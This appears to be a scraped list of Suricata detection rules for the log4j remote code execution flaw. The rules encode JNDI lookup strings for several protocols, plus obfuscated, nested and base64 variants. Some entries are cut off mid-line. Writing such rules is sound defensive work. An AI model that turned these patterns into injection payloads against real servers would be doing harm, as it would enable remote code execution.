Rule: alert tcp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass M1 (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"%7bjndi%3a"; nocase; fast_pattern; pcre:"/^(l|r|d|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(l|r|d)(\x7d|%7d))(d|n|m|(\x24|%24)(\x7b|%24)(lower|upper)(\x3a|%3a)(d|n|m)(\x7d|%7d))(a|i|s|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(a|i|s)(\x7d|%7d))(p|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)p(\x7d|%7d))/Ri"; reference:cve,2021-44228; classtype:attempted-admin; sid:2034781; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence High, signature_s
Suricata
ET EXPLOIT Apache log4j RCE Attempt (udp dns) (Outbound) (CVE-2021-44228)
suricata·2021-12-17·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Apache log4j RCE Attempt (udp dns) (Outbound) (CVE-2021-44228)
ET EXPLOIT Apache log4j RCE Attempt (udp dns) (Outbound) (CVE-2021-44228)
Rule: alert udp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp dns) (Outbound) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|dns|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day; reference:cve,2021-44228; classtype:attempted-admin; sid:2034763; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_12_17;)
Suricata
ET EXPLOIT Possible Apache log4j RCE Attempt - Base64 jndi (tcp) (Outbound) (CVE-2021-44228)
suricata·2021-12-17·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Possible Apache log4j RCE Attempt - Base64 jndi (tcp) (Outbound) (CVE-2021-44228)
ET EXPLOIT Possible Apache log4j RCE Attempt - Base64 jndi (tcp) (Outbound) (CVE-2021-44228)
Rule: alert tcp $HOME_NET any -> any any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt - Base64 jndi (tcp) (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|base64|3a|JHtqbmRp"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034751; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_12_17, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP Bypass M2 (Outbound) (CVE-2021-44228)
suricata·2021-12-17·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP Bypass M2 (Outbound) (CVE-2021-44228)
ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP Bypass M2 (Outbound) (CVE-2021-44228)
Rule: alert udp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP Bypass M2 (Outbound) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|"; nocase; fast_pattern; pcre:"/^(l|r|d|\x24\x7b(lower|upper)\x3a(l|r|d)\x7d)(d|n|m|\x24\x7b(lower|upper)\x3a(d|n|m)\x7d)(a|i|s|\x24\x7b(lower|upper)\x3a(a|i|s)\x7d)(p|\x24\x7b(lower|upper)\x3a(p)\x7d)/Ri"; content:"|3a 2f 2f|"; distance:0; reference:cve,2021-44228; classtype:attempted-admin; sid:2034799; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_12_17, mitre_tactic_id TA
Suricata
ET EXPLOIT Possible Apache log4j RCE Attempt - Base64 jndi (udp) (Outbound) (CVE-2021-44228)
suricata·2021-12-17·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Possible Apache log4j RCE Attempt - Base64 jndi (udp) (Outbound) (CVE-2021-44228)
ET EXPLOIT Possible Apache log4j RCE Attempt - Base64 jndi (udp) (Outbound) (CVE-2021-44228)
Rule: alert udp $HOME_NET any -> any any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt - Base64 jndi (udp) (Outbound) (CVE-2021-44228)"; content:"|24 7b|base64|3a|JHtqbmRp"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034750; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_12_17, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (Outbound) (CVE-2021-44228)
suricata·2021-12-17·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (Outbound) (CVE-2021-44228)
ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (Outbound) (CVE-2021-44228)
Rule: alert http $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldap|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day; reference:cve,2021-44228; classtype:attempted-admin; sid:2034759; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2022_05_03;)
Suricata
ET EXPLOIT Apache log4j RCE Attempt (http rmi) (Outbound) (CVE-2021-44228)
suricata·2021-12-17·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Apache log4j RCE Attempt (http rmi) (Outbound) (CVE-2021-44228)
ET EXPLOIT Apache log4j RCE Attempt (http rmi) (Outbound) (CVE-2021-44228)
Rule: alert http $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http rmi) (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|rmi|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day; reference:cve,2021-44228; classtype:attempted-admin; sid:2034758; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2022_05_03, reviewed_at 2024_05_07;)
Suricata
ET EXPLOIT Apache log4j RCE Attempt - Nested lower (tcp) (Outbound) (CVE-2021-44228)
suricata·2021-12-17·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Apache log4j RCE Attempt - Nested lower (tcp) (Outbound) (CVE-2021-44228)
ET EXPLOIT Apache log4j RCE Attempt - Nested lower (tcp) (Outbound) (CVE-2021-44228)
Rule: alert tcp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt - Nested lower (tcp) (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b 24 7b|lower|3a 24 7b|lower|3a|jndi"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034798; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_12_17, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass M2 (Outbound) (CVE-2021-44228)
suricata·2021-12-17·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass M2 (Outbound) (CVE-2021-44228)
ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass M2 (Outbound) (CVE-2021-44228)
Rule: alert tcp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass M2 (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|"; nocase; fast_pattern; pcre:"/^(l|r|d|\x24\x7b(lower|upper)\x3a(l|r|d)\x7d)(d|n|m|\x24\x7b(lower|upper)\x3a(d|n|m)\x7d)(a|i|s|\x24\x7b(lower|upper)\x3a(a|i|s)\x7d)(p|\x24\x7b(lower|upper)\x3a(p)\x7d)/Ri"; content:"|3a 2f 2f|"; distance:0; reference:cve,2021-44228; classtype:attempted-admin; sid:2034800; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 20
Suricata
ET EXPLOIT Apache log4j RCE Attempt (udp ldap) (Outbound) (CVE-2021-44228)
suricata·2021-12-17·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Apache log4j RCE Attempt (udp ldap) (Outbound) (CVE-2021-44228)
ET EXPLOIT Apache log4j RCE Attempt (udp ldap) (Outbound) (CVE-2021-44228)
Rule: alert udp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp ldap) (Outbound) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|ldap|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day; reference:cve,2021-44228; classtype:attempted-admin; sid:2034761; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2022_05_03;)
Suricata
ET EXPLOIT Possible Apache log4j RCE Attempt (tcp nis) (Outbound) (CVE-2021-44228)
suricata·2021-12-17·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Possible Apache log4j RCE Attempt (tcp nis) (Outbound) (CVE-2021-44228)
ET EXPLOIT Possible Apache log4j RCE Attempt (tcp nis) (Outbound) (CVE-2021-44228)
Rule: alert tcp $HOME_NET any -> any any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt (tcp nis) (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|nis|3a|"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034794; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_12_17, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT Apache log4j RCE Attempt (tcp ldaps) (Outbound) (CVE-2021-44228)
suricata·2021-12-17·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Apache log4j RCE Attempt (tcp ldaps) (Outbound) (CVE-2021-44228)
ET EXPLOIT Apache log4j RCE Attempt (tcp ldaps) (Outbound) (CVE-2021-44228)
Rule: alert tcp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp ldaps) (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldaps|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day; reference:cve,2021-44228; classtype:attempted-admin; sid:2034767; rev:1; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_12_17;)
Suricata
ET EXPLOIT Possible Apache log4j RCE Attempt (udp nds) (Outbound) (CVE-2021-44228)
suricata·2021-12-17·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Possible Apache log4j RCE Attempt (udp nds) (Outbound) (CVE-2021-44228)
ET EXPLOIT Possible Apache log4j RCE Attempt (udp nds) (Outbound) (CVE-2021-44228)
Rule: alert udp $HOME_NET any -> any any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt (udp nds) (Outbound) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|nds|3a|"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034791; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_12_17, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol TCP (Outbound) (CVE-2021-44228)
suricata·2021-12-17·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol TCP (Outbound) (CVE-2021-44228)
ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol TCP (Outbound) (CVE-2021-44228)
Rule: alert tcp $HOME_NET any -> any any (msg:"ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol TCP (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|"; nocase; fast_pattern; content:"|3a 2f 2f|"; within:20; reference:cve,2021-44228; classtype:misc-activity; sid:2034783; rev:3; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2024_03_08, reviewed_at 2024_05_07, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT Possible Apache log4j RCE Attempt (udp nis) (Outbound) (CVE-2021-44228)
suricata·2021-12-17·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Possible Apache log4j RCE Attempt (udp nis) (Outbound) (CVE-2021-44228)
ET EXPLOIT Possible Apache log4j RCE Attempt (udp nis) (Outbound) (CVE-2021-44228)
Rule: alert udp $HOME_NET any -> any any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt (udp nis) (Outbound) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|nis|3a|"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034793; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_12_17, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT Apache log4j RCE Attempt - Nested upper (tcp) (Outbound) (CVE-2021-44228)
suricata·2021-12-17·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Apache log4j RCE Attempt - Nested upper (tcp) (Outbound) (CVE-2021-44228)
ET EXPLOIT Apache log4j RCE Attempt - Nested upper (tcp) (Outbound) (CVE-2021-44228)
Rule: alert tcp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt - Nested upper (tcp) (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b 24 7b|upper|3a 24 7b|upper|3a|jndi"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034796; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_12_17, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT Possible Apache log4j RCE Attempt (tcp nds) (Outbound) (CVE-2021-44228)
suricata·2021-12-17·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Possible Apache log4j RCE Attempt (tcp nds) (Outbound) (CVE-2021-44228)
ET EXPLOIT Possible Apache log4j RCE Attempt (tcp nds) (Outbound) (CVE-2021-44228)
Rule: alert tcp $HOME_NET any -> any any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt (tcp nds) (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|nds|3a|"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034792; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_12_17, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT Apache log4j RCE Attempt (http ldaps) (Outbound) (CVE-2021-44228)
suricata·2021-12-17·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Apache log4j RCE Attempt (http ldaps) (Outbound) (CVE-2021-44228)
ET EXPLOIT Apache log4j RCE Attempt (http ldaps) (Outbound) (CVE-2021-44228)
Rule: alert http $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http ldaps) (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldaps|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day; reference:cve,2021-44228; classtype:attempted-admin; sid:2034768; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_12_17, reviewed_at 2024_05_07;)
Suricata
ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (upper TCP Bypass) (Outbound) (CVE-2021-44228)
suricata·2021-12-17·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (upper TCP Bypass) (Outbound) (CVE-2021-44228)
ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (upper TCP Bypass) (Outbound) (CVE-2021-44228)
Rule: alert tcp $HOME_NET any -> any any (msg:"ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (upper TCP Bypass) (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|"; nocase; fast_pattern; content:"|24 7b|upper|3a|"; distance:0; reference:cve,2021-44228; classtype:misc-activity; sid:2034785; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_12_17, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Applicati
Suricata
ET EXPLOIT Apache Obfuscated log4j RCE Attempt (tcp ldap) (CVE-2021-44228)
suricata·2021-12-17·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Apache Obfuscated log4j RCE Attempt (tcp ldap) (CVE-2021-44228)
ET EXPLOIT Apache Obfuscated log4j RCE Attempt (tcp ldap) (CVE-2021-44228)
Rule: alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache Obfuscated log4j RCE Attempt (tcp ldap) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b 24 7b|env|3a|NaN|3a|-j|7d|ndi|24 7b|env|3a|NaN|3a|"; nocase; fast_pattern; content:"|24 7b|env|3a|NaN|3a|-l|7d|dap|24|"; reference:url,twitter.com/bad_packets/status/1471253695459332102; reference:cve,2021-44228; classtype:attempted-admin; sid:2034755; rev:1; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, confidence High, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_12_17, mitre_tactic_id TA0005, mitre_tactic_name Defense_Evasion
Suricata
ET EXPLOIT Apache log4j RCE Attempt (udp ldaps) (Outbound) (CVE-2021-44228)
suricata·2021-12-17·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Apache log4j RCE Attempt (udp ldaps) (Outbound) (CVE-2021-44228)
ET EXPLOIT Apache log4j RCE Attempt (udp ldaps) (Outbound) (CVE-2021-44228)
Rule: alert udp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp ldaps) (Outbound) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|ldaps|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day; reference:cve,2021-44228; classtype:attempted-admin; sid:2034766; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2022_05_03;)
Suricata
ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed M2 (tcp) (Outbound) (CVE-2021-44228)
suricata·2021-12-17·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed M2 (tcp) (Outbound) (CVE-2021-44228)
ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed M2 (tcp) (Outbound) (CVE-2021-44228)
Rule: alert tcp $HOME_NET any -> any any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed M2 (tcp) (Outbound) (CVE-2021-44228)"; flow:established,to_server; stream_size:client,<,10000; content:"|24 7b|"; content:"|24 7b 3a 3a|"; within:100; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034786; rev:3; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2022_01_11, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Ex
Suricata
ET EXPLOIT Apache log4j RCE Attempt (tcp iiop) (Outbound) (CVE-2021-44228)
suricata·2021-12-17·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Apache log4j RCE Attempt (tcp iiop) (Outbound) (CVE-2021-44228)
ET EXPLOIT Apache log4j RCE Attempt (tcp iiop) (Outbound) (CVE-2021-44228)
Rule: alert tcp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp iiop) (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|iiop|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034787; rev:2; metadata:attack_target Client_and_Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_12_17;)
Suricata
ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol UDP (Outbound) (CVE-2021-44228)
suricata·2021-12-17·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol UDP (Outbound) (CVE-2021-44228)
ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol UDP (Outbound) (CVE-2021-44228)
Rule: alert udp $HOME_NET any -> any any (msg:"ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol UDP (Outbound) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|"; nocase; fast_pattern; content:"|3a 2f 2f|"; within:20; reference:cve,2021-44228; classtype:misc-activity; sid:2034784; rev:3; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2024_03_08, reviewed_at 2024_05_07, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT Apache log4j RCE Attempt - Nested lower (udp) (Outbound) (CVE-2021-44228)
suricata·2021-12-17·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Apache log4j RCE Attempt - Nested lower (udp) (Outbound) (CVE-2021-44228)
ET EXPLOIT Apache log4j RCE Attempt - Nested lower (udp) (Outbound) (CVE-2021-44228)
Rule: alert udp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt - Nested lower (udp) (Outbound) (CVE-2021-44228)"; content:"|24 7b 24 7b|lower|3a 24 7b|lower|3a|jndi"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034797; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_12_17, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP Bypass M1 (Outbound) (CVE-2021-44228)
suricata·2021-12-17·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP Bypass M1 (Outbound) (CVE-2021-44228)
ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP Bypass M1 (Outbound) (CVE-2021-44228)
Rule: alert udp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP Bypass M1 (Outbound) (CVE-2021-44228)"; content:"%7bjndi%3a"; nocase; fast_pattern; pcre:"/^(l|r|d|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(l|r|d)(\x7d|%7d))(d|n|m|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(d|n|m)(\x7d|%7d))(a|i|s|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(a|i|s)(\x7d|%7d))(p|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)p(\x7d|%7d))/Ri"; reference:cve,2021-44228; classtype:attempted-admin; sid:2034782; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit,
Suricata
ET EXPLOIT Apache log4j RCE Attempt (http dns) (Outbound) (CVE-2021-44228)
suricata·2021-12-17·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Apache log4j RCE Attempt (http dns) (Outbound) (CVE-2021-44228)
ET EXPLOIT Apache log4j RCE Attempt (http dns) (Outbound) (CVE-2021-44228)
Rule: alert http $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http dns) (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|dns|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day; reference:cve,2021-44228; classtype:attempted-admin; sid:2034765; rev:2; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2022_05_03, reviewed_at 2024_05_07;)
Suricata
ET EXPLOIT Apache log4j RCE Attempt (tcp dns) (Outbound) (CVE-2021-44228)
suricata·2021-12-17·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Apache log4j RCE Attempt (tcp dns) (Outbound) (CVE-2021-44228)
ET EXPLOIT Apache log4j RCE Attempt (tcp dns) (Outbound) (CVE-2021-44228)
Rule: alert tcp $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp dns) (Outbound) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|dns|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day; reference:cve,2021-44228; classtype:attempted-admin; sid:2034764; rev:1; metadata:attack_target Server, created_at 2021_12_17, cve CVE_2021_44228, deployment Perimeter, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_12_17;)
Suricata
ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (rce .ee)
suricata·2021-12-17·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (rce .ee)
ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (rce .ee)
